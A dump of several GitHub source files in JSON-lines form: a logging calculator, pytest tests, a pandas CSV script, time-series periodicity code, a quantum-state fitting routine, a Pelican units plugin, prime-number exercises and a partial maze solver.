logging.FileHandler('logfile.log')\nfile_handler.setFormatter(formatter)\n\nlog.addHandler(file_handler)\n# logging.basicConfig(filename='logfile.log', level=logging.DEBUG,\n# format='%(asctime)s - line %(lineno)d in %(filename)s - %(message)s', datefmt='%d-%b-%y %H:%M:%S')\n\n\ndef add(x, y):\n \"\"\"adds 2 numbers\"\"\"\n log.info(f'adding {x} and {y}')\n return x + y\n\n\ndef substract(x, y):\n \"\"\"substraction between 2 numbers\"\"\"\n logging.info(f'subtracting {y} from {x}')\n return x - y\n\n\ndef multiply(x, y):\n \"\"\"multiplication of 2 numbers\"\"\"\n return x * y\n\n\ndef division(x, y):\n \"\"\"divide a number with another\"\"\"\n try:\n return x / y\n except ZeroDivisionError as e:\n logging.exception(e)\n\n\nresult = add(10, 5)\nprint(result)\n# print(division(21, 0))\n","repo_name":"alxayeed/python-logging","sub_path":"logger/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74406724487","text":"from __future__ import annotations\n\nimport pytest\n\nfrom silence_fixit_error import _find_violations\nfrom silence_fixit_error import _parse_output_line\nfrom silence_fixit_error import main\nfrom silence_fixit_error import Violation\n\n\n@pytest.mark.parametrize(\n 'lines, expected_violations', (\n pytest.param(\n ['t.py@1:2 MyRuleName: the error message'],\n [Violation('t.py', 'MyRuleName', 1)],\n id='single-line',\n ),\n pytest.param(\n [\n 't.py@1:2 MyRuleName: the error message',\n 'which continue over multiple lines',\n 'just like this one does.',\n ],\n [Violation('t.py', 'MyRuleName', 1), None, None],\n id='multi-line',\n ),\n pytest.param(\n [\n 't.py@1:2 MyRuleName: ',\n 'the error message on a new line',\n 'which continue over multiple lines',\n 'just like this one does.',\n ],\n [Violation('t.py', 'MyRuleName', 1), None, None, None],\n 
id='multi-line-leading-ws',\n ),\n pytest.param(\n [\n 't.py@1:2 MyRuleName: the error message',\n 'which continue over multiple lines',\n 'just like this one does.',\n '',\n ],\n [Violation('t.py', 'MyRuleName', 1), None, None, None],\n id='multi-line-trailing-ws',\n ),\n pytest.param(\n ['t.py@1:2 MyRuleName: '],\n [Violation('t.py', 'MyRuleName', 1)],\n id='no-message',\n ),\n ),\n)\ndef test_parse_output_line(lines, expected_violations):\n violations = [\n _parse_output_line(line)\n for line in lines\n ]\n\n assert violations == expected_violations\n\n\ndef test_find_violations(tmp_path, capsys):\n python_module = tmp_path / 't.py'\n python_module.write_text(\"\"\"\\\nx = None\nisinstance(x, str) or isinstance(x, int)\n\"\"\")\n\n violations = _find_violations(\n 'fixit.rules:CollapseIsinstanceChecks', [str(python_module)],\n )\n\n assert violations == {\n str(python_module): [\n Violation(str(python_module), 'CollapseIsinstanceChecks', 2),\n ],\n }\n\n\ndef test_main(tmp_path, capsys):\n python_module = tmp_path / 't.py'\n python_module.write_text(\"\"\"\\\nx = None\nisinstance(x, str) or isinstance(x, int)\n\ndef f(x):\n return isinstance(x, str) or isinstance(x, int)\n\"\"\")\n\n ret = main(('fixit.rules:CollapseIsinstanceChecks', str(python_module)))\n\n assert ret == 1\n assert python_module.read_text() == \"\"\"\\\nx = None\n# lint-fixme: CollapseIsinstanceChecks\nisinstance(x, str) or isinstance(x, int)\n\ndef f(x):\n # lint-fixme: CollapseIsinstanceChecks\n return isinstance(x, str) or isinstance(x, int)\n\"\"\"\n\n captured = capsys.readouterr()\n assert captured.err == f\"\"\"\\\n-> running fixit\nfound violations in 1 files\n-> adding fixme comments\n{python_module}\n\"\"\"\n\n\ndef test_main_no_violations(tmp_path, capsys):\n src = \"\"\"\\\ndef foo():\n print('hello there')\n\"\"\"\n\n python_module = tmp_path / 't.py'\n python_module.write_text(src)\n\n ret = main(('fixit.rules:CollapseIsinstanceChecks', str(python_module)))\n\n assert ret == 0\n assert python_module.read_text() == src\n\n captured = capsys.readouterr()\n assert captured.err == \"\"\"\\\n-> running fixit\nno violations found\n\"\"\"\n\n\ndef test_main_multiple_different_violations(tmp_path, capsys):\n src = \"\"\"\\\nx = None\nisinstance(x, str) or isinstance(x, int)\n\nif True:\n pass\n\"\"\"\n\n python_module = tmp_path / 't.py'\n python_module.write_text(src)\n\n ret = main(('fixit.rules', str(python_module)))\n\n assert ret == 1\n\n captured = capsys.readouterr()\n assert captured.err == \"\"\"\\\n-> running fixit\nfound violations in 1 files\nERROR: errors found for multiple rules: ['CollapseIsinstanceChecks', 'NoStaticIfCondition']\n\"\"\" # noqa: E501\n","repo_name":"samueljsb/silence-fixit-error","sub_path":"tests/silence_fixit_error_test.py","file_name":"silence_fixit_error_test.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"34055128501","text":"# -*- coding: utf-8 -*-\n\"\"\"\n# duplicate-file-finder\nhttps://github.com/dougthor42/duplicate-file-finder\nPlan out the reorganization of your file systems.\n\"\"\"\nfrom pathlib import Path\n\n__all__ = [\n \"__author__\",\n \"__author_email__\",\n \"__maintainer__\",\n \"__maintainer_email__\",\n \"__license__\",\n \"__version__\",\n \"__released__\",\n \"__created__\",\n \"__project_name__\",\n \"__project_url__\",\n \"__package_name__\",\n \"__description__\",\n \"__long_descr__\",\n]\n\n__author__ = \"Douglas Thor\"\n__author_email__ = 
\"doug.thor@gmail.com\"\n\n__maintainer__ = \"\"\n__maintainer_email__ = \"\"\n\n__license__ = \"MIT\"\n__version__ = \"0.0.0\"\n__released__ = \"\"\n__created__ = \"2020-11-01\"\n\n__project_name__ = \"duplicate-file-finder\"\n__project_url__ = \"https://github.com/dougthor42/duplicate-file-finder\"\n__package_name__ = \"duplicate_file_finder\"\n\n__description__ = \"Find all files with matching md5 checksums.\"\n__long_descr__ = __doc__\n\n# Try to read the README file and use that as our long description.\ntry:\n base_dir = Path(__file__).parent.parent\n readme = base_dir / \"README.md\"\n __long_descr__ = readme.read_text()\nexcept Exception:\n pass\n","repo_name":"dougthor42/duplicate-file-finder","sub_path":"src/duplicate_file_finder/__about__.py","file_name":"__about__.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"28995625858","text":"import sys\n\nimport pandas as pd\nfrom money_parser import price_str\n\n\nFEED_CSV_FILENAME = 'feed.csv'\nFEED_SAMPLE_CSV_FILENAME = 'feed_sample.csv'\n\n# Column Names\nCOL_PRODUCT_NAME = 'product_name'\nCOL_PRICE = 'price'\nCOL_PRICE_EDITED = 'price_edited'\n\n# Part 2 Regex (Knit w/o Jumper)\nPART_2_REGEX = '^(?=.*Knit)(?!.*Jumper).*'\n\n\ndef main(argv):\n if argv[1] == FEED_CSV_FILENAME:\n step_1(argv)\n elif argv[1] == FEED_SAMPLE_CSV_FILENAME:\n step_2(argv)\n\n\ndef step_2(argv):\n data_frame = pd.read_csv(argv[1])\n df_filter = get_df_filter_by_regex(data_frame, PART_2_REGEX, COL_PRODUCT_NAME)\n data_frame = data_frame[~df_filter]\n data_frame.to_csv(argv[3])\n\n\ndef get_df_filter_by_regex(df, regex, column_name):\n return df[column_name].str.contains(regex)\n\n\ndef step_1(argv):\n create_csv_from_tsv(argv[1], argv[3])\n data_frame = pd.read_csv(argv[3])\n create_new_column_in_csv(data_frame,\n COL_PRICE_EDITED,\n data_frame[COL_PRICE].apply(lambda x: extract_price_from_string(x)), argv[3])\n\n\ndef create_new_column_in_csv(data_frame, column_name, data_frame_column, file_name):\n data_frame[column_name] = data_frame_column\n data_frame.to_csv(file_name)\n\n\ndef extract_price_from_string(price):\n return price_str(price)\n\n\ndef create_csv_from_tsv(tsv_file_name, csv_output_file_name):\n csv_table = pd.read_csv(tsv_file_name, sep='\\t')\n csv_table.to_csv(csv_output_file_name, index=False)\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"uriFrischman/syte-assignment","sub_path":"csv-task.py","file_name":"csv-task.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37566923501","text":"from scipy.stats import spearmanr\nfrom statsmodels.tsa.stattools import acf\nfrom scipy.signal import argrelmax\nfrom decompose import stl_decompose\nfrom numpy import array, arange, std, median, inf, ceil, arctan\n\n\ndef DRel(itseries, nfreq):\n \"\"\"\n Doing STL seasonal decomposition on time series itseries vector data with\n window length nfreq and returns standard deviation ratio of seasonal and\n reminder components of decomposition for last season of time series. This\n ratio can be used to determine if time series has periodicity with length\n nfreq or not. 
When it is more than unity then it is possible to have a periodic\n    pattern, but the auto-correlation function is needed to set reliability for\n    periodicity.\n\n    Parameters\n    ----------\n    itseries: 1D array\n        one dimensional array of time series\n\n    nfreq: integer\n        possible periodic pattern length\n\n    Returns\n    -------\n    ratio: numeric\n        ratio of standard deviation of seasonal and standard deviation of remainder\n        seasonal and remainder are stl decomposition components\n\n    crho: numeric\n        correlation rho value between last two days\n\n    crho_last: numeric\n        correlation rho value between last day and seasonal component\n\n    relat: numeric\n        median value for seasonal/remainder ratio\n    \"\"\"\n    ratio = 0.0\n    relat = 0.0\n    crho = 0.0\n    crho_last = 0.0\n    nobsi = len(itseries)\n    tryerror = False\n    intseries = array(itseries)  # casting to numpy array\n    coeff = 1.0\n    if (nobsi / nfreq) > 2.0:\n        indi = arange((nobsi - nfreq), nobsi)\n        intseries_right = intseries[indi]\n        intseries_left = intseries[(indi - nfreq)]\n        try:\n            crho = spearmanr(intseries_left, intseries_right)[0]\n        except Exception:\n            crho = 0\n        if (nobsi / nfreq) >= 3:\n            try:  # STL decomposition with window size nfreq\n                xad_decomp = stl_decompose(intseries, period=nfreq, robust=False)\n            except Exception:\n                tryerror = True\n            if not tryerror:\n                rem = xad_decomp['remainder'][-nfreq:]\n                ses = xad_decomp['seasonal'][-nfreq:]\n                if std(rem, ddof=1) > 0:\n                    try:\n                        crho_last = spearmanr(ses, intseries_right)[0]\n                    except Exception:\n                        crho_last = 0\n                    # standard deviation ratio of seasonal/remainder for last season\n                    ratio = std(ses, ddof=1) / std(rem, ddof=1)\n                    relat = median(ses / rem)\n                    if (relat < 0) and (crho < 0.4) and (crho_last < 0.4):\n                        coeff = 0.0\n                    if (min(crho, crho_last) < 0.1) and (relat < 0):\n                        coeff = 0.0\n                    if (crho > 0.7) or (crho_last > 0.9):\n                        coeff = 2.0\n                else:\n                    if std(ses, ddof=1) > 0:\n                        ratio = inf\n                        relat = inf\n    ratio = ratio * coeff\n    return ratio, crho, crho_last, relat, coeff\n\n\ndef NRel(itseries, obsi):\n    \"\"\"\n    Doing auto-correlation analysis of itseries time series to check and give\n    reliability of having a periodic pattern with length obsi. It also uses DRel()\n    method to combine with auto-correlation peak value around lag value obsi.\n\n    Parameters\n    ----------\n    itseries: 1D array\n        one dimensional array of time series\n\n    obsi: integer\n        possible periodic pattern length\n\n    Returns\n    -------\n    nacfpeak: array of length 2\n        vector of length 2, nacfpeak[0] is periodic pattern length i.e. obsi\n        nacfpeak[1] is periodic pattern reliability\n        nacfpeak[2] is Kolmogorov-Smirnov lambda\n    \"\"\"\n    nacfpeak = array([obsi, 0.0])\n    instep = len(itseries)  # number of elements in time series\n    if (float(instep) / float(obsi)) > 2.0:\n        # if fewer than 3 periodic patterns exist in the time series then no acf\n        # and STL decomposition can be done\n        x1d_acf = array(acf(itseries, nlags=ceil(1.5 * obsi)))\n        # searching peaks in acf values\n        peak1d = array(argrelmax(x1d_acf))\n        # selecting peaks by pattern length 2/12, i.e. 
4 hours for daily\n # pattern around acf lag value obsi\n peak1d = peak1d[peak1d >= (obsi - ceil(obsi / 12.0))]\n peak1d = peak1d[peak1d <= (obsi + ceil(obsi / 12.0))]\n # getting maximal value of selected peaks if possible\n if len(peak1d) > 0:\n corval = max(x1d_acf[peak1d])\n else:\n corval = 0.0 # otherwise corellation value is set 0\n per_markers = DRel(itseries, obsi)\n if (corval < 0.1):\n tin = 0\n else:\n tin = 1\n if (corval < 0.25):\n corval = 0\n if (per_markers[1] < 0.1) or (per_markers[2] < 0.1):\n tin = 0\n reliab = corval + tin * per_markers[0]\n reliab = arctan(reliab) / (2.0 * arctan(1.0))\n if ((instep / obsi) < 3) and (per_markers[0] == 0):\n if (corval > 0.25) and (per_markers[1] > 0.5):\n reliab = max(corval, per_markers[1])\n nacfpeak[1] = reliab\n return nacfpeak\n","repo_name":"khharut/pyhistavg","sub_path":"pyhistavg/periodicity.py","file_name":"periodicity.py","file_ext":"py","file_size_in_byte":5132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"44253149751","text":"# file to implement gradient descent on Alec's expression for adding another QWP\n\nimport numpy as np\nfrom scipy.optimize import minimize, approx_fprime, brute\n\nfrom rho_methods import *\nfrom sample_rho import *\n\ndef alec_expr(angles):\n '''Get density matrix based on Alec's expression for adding another QWP'''\n # unpack angles\n alpha, gamma, delta, phi = angles\n\n a_state = np.cos(alpha)*(np.cos(gamma)*np.cos(delta) - 1j * np.sin(gamma)*np.sin(delta)) * np.array([1, 0, 0, 0]).reshape(4,1) + np.cos(alpha)*(np.sin(gamma)*np.cos(delta) + 1j*np.cos(gamma)*np.sin(delta))*np.array([0,1,0,0]).reshape(4,1) + np.sin(alpha)*(np.cos(gamma)*np.sin(delta) + 1j*np.sin(gamma)*np.cos(delta))*np.exp(1j*phi)*np.array([0,0,1,0]).reshape(4,1) + np.sin(alpha)*(np.sin(gamma)*np.sin(delta) - 1j*np.cos(gamma)*np.cos(delta))*np.exp(1j*phi)*np.array([0,0,0,1]).reshape(4,1)\n\n return a_state @ a_state.conj().T\n\ndef alec_decompose(targ_rho, targ_name = 'Test',zeta=.7, frac=0.1, N = 1000, eps=0.999, verbose=False):\n '''Decomposes target state into params pased on experimental components for Alec's expression; modified from jones_decompose method in rho_methods.py\n __\n Parameters:\n targ_rho: target state to decompose, 4x4 numpy array\n name: name of state to decompose, string\n zeta: learning rate, float\n frac: how often to break the GD and get random angles, float\n N: max number of iterations, int\n eps: max fidelity, float\n verbpse: whether to print out progress, bool\n __\n Returns:\n angles: angles for each component, 1x4 numpy array\n pred_rho: predicted state from angles, 4x4 numpy array\n '''\n\n def get_random_angles():\n '''Get random angles for each component'''\n # alpha, gamma, delta, phi\n # return [np.random.rand()*np.pi/2, np.random.rand()*np.pi/2, np.random.rand()*np.pi/2, np.random.rand()*2*np.pi]\n return np.random.rand(4)*2*np.pi\n\n # set bounds for angles\n # bounds = [(0,np.pi/2),(0,np.pi/2),(0,np.pi/2),(0,2*np.pi)]\n bounds = [(0, 2*np.pi),(0, 2*np.pi),(0, 2*np.pi),(0, 2*np.pi)]\n\n # functions for GD #\n def loss_fidelity(x0):\n pred_rho = alec_expr(x0)\n fidelity = get_fidelity(pred_rho, targ_rho)\n return 1-np.sqrt(fidelity)\n\n def minimize_angles(x0):\n result = minimize(loss_fidelity, x0=x0, bounds=bounds)\n best_angles = result.x\n rho = alec_expr(best_angles)\n fidelity = get_fidelity(rho, targ_rho)\n return best_angles, fidelity, rho\n\n # initialize angles\n x0 = get_random_angles()\n angles, fidelity, rho = 
minimize_angles(x0)\n\n # set initial bests\n best_angles = angles\n best_fidelity = fidelity\n best_rho = rho\n\n # gradient descent\n grad_angles= best_angles\n n = 0\n index_since_improvement = 0\n while n < N and best_fidelity < eps:\n if verbose: \n print('n', n)\n print(fidelity, best_fidelity)\n\n if index_since_improvement % (frac*N)==0: # periodic random search (hop)\n x0 = get_random_angles()\n else:\n gradient = approx_fprime(grad_angles, loss_fidelity, epsilon=1e-8) # epsilon is step size in finite difference\n # if verbose: print(gradient)\n # update angles\n x0 = [best_angles[i] - zeta*gradient[i] for i in range(len(best_angles))]\n grad_angles = x0\n\n # minimize angles\n best_angles, fidelity, rho = minimize_angles(x0)\n if fidelity > best_fidelity: # if new best, update\n best_fidelity = fidelity\n best_angles = best_angles\n best_rho = rho\n index_since_improvement = 0\n else: # if not new best, increment index\n index_since_improvement += 1\n\n n+=1 # increment iteration\n if verbose:\n print('Best fidelity: ', best_fidelity)\n print('Best angles: ', best_angles)\n print('Best rho: ', best_rho)\n print('Actual rho: ', targ_rho)\n\n return targ_name, n, best_fidelity, best_angles[0], best_angles[1], best_angles[2], best_angles[3], best_rho, targ_rho\n\ndef alec_decompose_brute(targ_rho, targ_name = 'Test'):\n '''Alternate of alec_decompose but using scipy.optimize.brute instead of gradient descent\n __\n Parameters:\n targ_rho: target state to decompose, 4x4 numpy array\n name: name of state to decompose, string\n zeta: learning rate, float\n frac: how often to break the GD and get random angles, float\n N: max number of iterations, int\n eps: max fidelity, float\n verbpse: whether to print out progress, bool\n __\n Returns:\n angles: angles for each component, 1x4 numpy array\n pred_rho: predicted state from angles, 4x4 numpy array\n '''\n bounds = [(0, 2*np.pi),(0, 2*np.pi),(0, 2*np.pi),(0, 2*np.pi)]\n\n def loss_fidelity(x0):\n pred_rho = alec_expr(x0)\n fidelity = get_fidelity(pred_rho, targ_rho)\n return 1-np.sqrt(fidelity)\n \n fval = brute(loss_fidelity, ranges=bounds).fval\n # compute results\n best_rho = alec_expr(*fval)\n best_fidelity = get_fidelity(best_rho, targ_rho)\n\n return targ_name, best_fidelity, best_rho, targ_rho\n\nif __name__=='__main__':\n from time import time\n from tqdm import trange\n targ = get_E1(np.pi/4, np.pi/2)\n targ_name = 'E1_45_90'\n N = 100\n # fidelity_ls = []\n # n_ls = []\n # t0 = time()\n # for l in trange(N):\n # _, n, best_fidelity, _, _, _,_, _, _ = alec_decompose(targ, targ_name, N=1000, verbose=False)\n # fidelity_ls.append(best_fidelity)\n # n_ls.append(n)\n # tf = time()\n # print('Average fidelity: ', np.mean(fidelity_ls))\n # print('SEM fidelity: ', np.std(fidelity_ls)/np.sqrt(N))\n # print('Average iterations: ', np.mean(n_ls))\n # print('SEM iterations: ', np.std(n_ls)/np.sqrt(N))\n # print('Time: ', tf-t0)\n \n fidelity_ls = []\n n_ls = []\n t0 = time()\n for l in trange(N):\n targ_name, best_fidelity, best_rho, targ_rho = alec_decompose_brute(targ, targ_name)\n fidelity_ls.append(best_fidelity)\n tf = time()\n print('Average fidelity: ', np.mean(fidelity_ls))\n print('SEM fidelity: ', np.std(fidelity_ls)/np.sqrt(N))\n print('Time: ', tf-t0)\n","repo_name":"Lynn-Quantum-Optics/Summer-2023","sub_path":"oscar/machine_learning/alec_expr.py","file_name":"alec_expr.py","file_ext":"py","file_size_in_byte":6289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} 
+{"seq_id":"29503529951","text":"import logging\nimport re\n\nfrom pelican.settings import DEFAULT_CONFIG\nfrom pelican import contents, signals\n\nlogger = logging.getLogger(__name__)\n\ntry:\n import pint\nexcept ImportError:\n logger.fatal(\"Pint not found\")\n\ntry:\n import inflect\nexcept ImportError:\n logger.fatal(\"Inflect not found\")\n\n\ndef pluralizer(value):\n \"\"\"This procedure pluralizes the unit if it is not singular.\n\n\n Args:\n value ([Quantity]): [parameter takes in a pint quantity]\n\n Returns:\n [string]: [returns a formatted string of the magnitude with a pluralized or singular unit]\n \"\"\"\n\n if value.magnitude != 1:\n p = inflect.engine()\n return p.inflect(\n \"{magnitude} plural('{units}')\".format(\n magnitude=round(value.magnitude, DEFAULT_CONFIG[\"UNIT_PRECISION\"]),\n units=value.units,\n )\n )\n else:\n return \"{magnitude} {units}\".format(\n magnitude=round(value.magnitude, DEFAULT_CONFIG[\"UNIT_PRECISION\"]),\n units=value.units,\n )\n\n\ndef replacer(value):\n \"\"\"This procedure takes in markdown search for specified unit text and converts unit annotations\n\n Args:\n value ([string]): [parameter takes in the preprocess markdown]\n\n Returns:\n [string]: [returns the preprocess markdown with any unit annotations converted to alternate units]\n \"\"\"\n\n ureg = pint.UnitRegistry(autoconvert_offset_to_baseunit=True)\n ureg.default_system = DEFAULT_CONFIG[\"UNIT_SYSTEM\"]\n expression = value.group()[5:-1].strip()\n Q_ = ureg.Quantity\n\n if \"::\" in expression:\n unit, *other_units = expression.split(\"::\")\n unit = Q_(unit)\n converted_unit = \", \".join(\n [pluralizer(unit.to(other_unit)) for other_unit in other_units]\n )\n unit = pluralizer(unit)\n\n else:\n unit = pluralizer(Q_(expression))\n converted_unit = pluralizer(Q_(expression).to_base_units())\n\n html_unit = DEFAULT_CONFIG[\"UNIT_HTML_WRAPPER\"].format(\n unit=unit, converted=converted_unit\n )\n return html_unit\n\n\ndef initialized(pelican):\n \"\"\"Initializes default variables and then checks for changes to the default in the pelican.conf\n\n Args:\n pelican ([string]): [parameter takes in all the set variables in the pelican.conf]\n \"\"\"\n\n DEFAULT_CONFIG.setdefault(\"UNIT_SYSTEM\", \"SI\")\n DEFAULT_CONFIG.setdefault(\"UNIT_PRECISION\", 2)\n DEFAULT_CONFIG.setdefault(\"UNIT_HTML_WRAPPER\", \"{unit} ({converted})\")\n\n if pelican:\n pelican.settings.setdefault(\"UNIT_SYSTEM\", \"SI\")\n pelican.settings.setdefault(\"UNIT_PRECISION\", 2)\n pelican.settings.setdefault(\n \"UNIT_HTML_WRAPPER\", \"{unit} ({converted})\"\n )\n\n\ndef unit(content):\n \"\"\"checks the content for a unit annotation. 
If there is, it sends it for processing, else it skips the content\n\n Args:\n content ([string]): [contains the markdown content of each article or page entry in the corpus]\n \"\"\"\n\n if isinstance(content, contents.Static):\n return\n\n if content._content and (\"{unit:\" in content._content):\n pattern = re.compile(r\"\\{unit:([^}]+)\\}\")\n content._content = re.sub(pattern, replacer, content._content)\n\n\ndef register():\n \"\"\"Registers the plugin with the pelican signal system\"\"\"\n signals.initialized.connect(initialized)\n signals.content_object_init.connect(unit)\n","repo_name":"bnice5000/pelican_units","sub_path":"units.py","file_name":"units.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10856444759","text":"import doctest\nimport math\n\n\ndef est_premier(n):\n \"\"\"\n Détermine si n est un nombre premier.\n :param n: (int) Nombre n.\n :return: (bool) Résultat.\n\n >>> est_premier(3)\n True\n \"\"\"\n i = 1\n while i < math.sqrt(n):\n i += 1\n if n % i == 0:\n if i == n:\n return True\n else:\n return False\n return True\n\n\ndef premier_suivant(n):\n \"\"\"\n Détermine le premier nombre entier supérieur à n.\n :param n: (int) Nomnbre n.\n :return: (int) Nombre entier supérieur à n\n\n >>> premier_suivant(2)\n 3\n \"\"\"\n while True:\n n += 1\n if est_premier(n):\n return n\n\n\ndef affiche_premiers(n):\n \"\"\"\n Affiche tous les nombres premiers inférieurs à n\n :param n: (int) Nombre n.\n\n >>> affiche_premiers(5)\n 2\n 3\n \"\"\"\n i = 2\n while i < n:\n if est_premier(i):\n print(i)\n i += 1\n\n\ndef contient_puissance(n, p):\n \"\"\"\n Calcule la plus grande puissance de p tel que n soit divisible par celle-ci.\n :param n: (int) Nombre.\n :param p: (int) Nombre premier.\n :return: (int) Puissance de p.\n\n >>> contient_puissance(1024, 2)\n 10\n \"\"\"\n if not est_premier(p):\n return\n i = 0\n while n % p == 0:\n i += 1\n n //= p\n return i\n\n\ndef decomposition(n):\n \"\"\"\n Décomposer l'entier n comme le produit de puissances de nombres premiers.\n :param n: (int) Nombre.\n :return: (str) Expression de la décomposition.\n\n >>> decomposition(301158)\n '301158 = 2**1 * 3**4 * 11**1 * 13**2'\n \"\"\"\n i = 0\n quotient = n\n p = 2\n result = str(n) + \" = \"\n while quotient != 1:\n power = contient_puissance(quotient, p)\n if power < 1:\n p = premier_suivant(p)\n continue\n\n quotient = quotient // p ** power\n if i > 0:\n result += \" * \"\n result += str(p) + \"**\" + str(power)\n p = premier_suivant(p)\n i += 1\n return result\n\n\ndoctest.testmod()\n","repo_name":"SlamaFR/L1-S1-Algorithm-Programming","sub_path":"TP4/Ex 4.py","file_name":"Ex 4.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"45085858079","text":"from dataclasses import dataclass\nimport networkx as nx\nfrom itertools import combinations, permutations, chain, groupby\n\n\n@dataclass\nclass Point:\n x: int\n y: int\n\n def __getitem__(self, item):\n return self.x if item == 0 else self.y\n\n def __add__(self, other):\n return Point(self.x + other.x, self.y + other.y)\n\n def __sub__(self, other):\n return Point(self.x - other.x, self.y - other.y)\n\n def __mul__(self, other: int):\n return Point(self.x * other, self.y * other)\n\n def __hash__(self):\n return self.x*100+self.y\n\n def __repr__(self):\n return f\"(x={self.x}, y={self.y})\"\n\n\ndef P(x, y) -> Point:\n return 
Point(x, y)\n\n\nclass Map:\n def __init__(self, init_size=P(1,1)):\n self.size = init_size\n self.tiles = {}\n self.default = \" \"\n\n def _update_boundary(self, point: Point):\n max_y = max(abs(self.size.y), abs(point.y)+1)\n max_x = max(abs(self.size.x), abs(point.x)+1)\n self.size = P(max_x, max_y)\n\n def _set_panel_value(self, point: Point, value):\n if not point.x in self.tiles:\n self.tiles[point.x] = {}\n self.tiles[point.x][point.y] = value\n\n def _panel_exists(self, point: Point):\n return (point.x in self.tiles) and (point.y in self.tiles[point.x])\n\n def __getitem__(self, point: Point):\n self._update_boundary(point)\n return self.tiles[point.x][point.y] if self._panel_exists(point) else self.default\n\n def __setitem__(self, point: Point, value):\n self._update_boundary(point)\n self._set_panel_value(point, value)\n\n\ndef node(level, point):\n return f\"l{level}-{point}\"\n\n\nclass Maze:\n def __init__(self, graph, portals, aa, zz):\n self.graph = graph\n self.portals = portals\n self.aa = aa\n self.zz = zz\n\n @classmethod\n def parse(cls, lines, size, hole_position, hole_size):\n\n def fill_map(size, lines):\n map = Map(init_size=size)\n for y, line in enumerate([l for l in lines.splitlines() if len(l)]):\n line = line.ljust(size.x)\n for x, c in enumerate(line):\n p = P(x, y)\n map[p] = c\n return map\n\n def detect_teleports(map, xit, yit, first_letter_offset, secont_letter_offset):\n for x in xit:\n for y in yit:\n p = P(x, y)\n c = map[p]\n fl = map[p+first_letter_offset]\n sl = map[p+secont_letter_offset]\n if c == '.' and 'A' <= fl <= 'Z' and 'A' <= sl <= 'Z':\n yield fl+sl, p\n\n def detect_portals(map, hole_position, hole_size):\n tl = hole_position + P(-1, -1)\n br = hole_position + hole_size\n tr = P(br.x, tl.y)\n bl = P(tl.x, br.y)\n outer_portals = list(chain(\n detect_teleports(map, range(2, size.x - 2), [2], P(0, -2), P(0, -1)), # top\n detect_teleports(map, range(2, size.x - 2), [size.y - 3], P(0, 1), P(0, 2)), # bottom\n detect_teleports(map, [2], range(2, size.y - 2), P(-2, 0), P(-1, 0)), # left\n detect_teleports(map, [size.x - 3], range(2, size.y - 2), P(1, 0), P(2, 0)), # right\n ))\n outer_portals = [(k, p, 'outer') for k, p in outer_portals]\n inner_portals = list(chain(\n detect_teleports(map, range(tl.x, tr.x), [tl.y], P(0, 1), P(0, 2)), # top\n detect_teleports(map, range(bl.x, br.x), [br.y], P(0, -2), P(0, -1)), # bottom\n detect_teleports(map, [tl.x], range(tl.y, bl.y), P(1, 0), P(2, 0)), # left\n detect_teleports(map, [tr.x], range(tr.y, br.y), P(-2, 0), P(-1, 0)), # right\n ))\n inner_portals = [(k, p, 'inner') for k, p in inner_portals]\n\n st = sorted(chain(outer_portals, inner_portals), key=lambda t: t[0])\n portals = {k: list(grp) for k, grp in groupby(st, key=lambda t: t[0])}\n aa = portals['AA'][0]\n zz = portals['ZZ'][0]\n portals.pop('AA')\n portals.pop('ZZ')\n return aa, zz, portals\n\n def build_level(g, map, level):\n for y in range(1, map.size.y - 1):\n for x in range(1, map.size.x - 1):\n p = P(x, y)\n c = map[p]\n if c == '.':\n for tp in [p + P(1, 0), p + P(-1, 0), p + P(0, -1), p + P(0, 1)]:\n tc = map[tp]\n if tc == '.':\n g.add_edge(node(level, p), node(level, tp), weight=1)\n\n def add_portal_connections(g, portals, fl, tl):\n for k, (p1, p2) in portals.items():\n if p1[2] == 'outer' and p2[2] == 'outer':\n g.add_edge(node(tl, p1[1]), node(tl, p2[1]), weight=1)\n if p1[2] == 'inner':\n g.add_edge(node(fl, p1[1]), node(tl, p2[1]), weight=1)\n if p2[2] == 'inner':\n g.add_edge(node(fl, p2[1]), node(tl, p1[1]), weight=1)\n\n 
map = fill_map(size, lines)\n aa, zz, portals = detect_portals(map, hole_position, hole_size)\n graph = nx.Graph()\n build_level(graph, map, 0)\n for level in range(1, 100):\n build_level(graph, map, level)\n add_portal_connections(graph, portals, level-1, level)\n return cls(graph, portals, aa, zz)\n\n def shortest_path(self):\n start_point = node(0, self.aa[1])\n end_point = node(0, self.zz[1])\n return nx.shortest_path_length(self.graph, start_point, end_point, weight='weight')\n\n def path(self, f, t):\n return nx.shortest_path(self.graph, f, t)\n\n # def __getitem__(self, item):\n # points = self.teleports[item]\n # if len(points) == 2:\n # if points[0].y > points[1].y:\n # return points[1], points[0]\n # elif points[0].y < points[1].y:\n # return points[0], points[1]\n # else:\n # return points[0], points[1]\n # else:\n # return points\n\n# s = Maze.parse(\"\"\"\n# A\n# A\n# #######.#########\n# #######.........#\n# #######.#######.#\n# #######.#######.#\n# #######.#######.#\n# ##### B ###.#\n# BC...## C ###.#\n# ##.## ###.#\n# ##...DE F ###.#\n# ##### G ###.#\n# #########.#####.#\n# DE..#######...###.#\n# #.#########.###.#\n# FG..#########.....#\n# ###########.#####\n# Z\n# Z\n# \"\"\", size=P(21, 19), hole_position=P(7,7), hole_size=P(7, 5))\n# assert s.shortest_path() == 26\n\n# s = Maze.parse(\"\"\"\n# A\n# A\n# #################.#############\n# #.#...#...................#.#.#\n# #.#.#.###.###.###.#########.#.#\n# 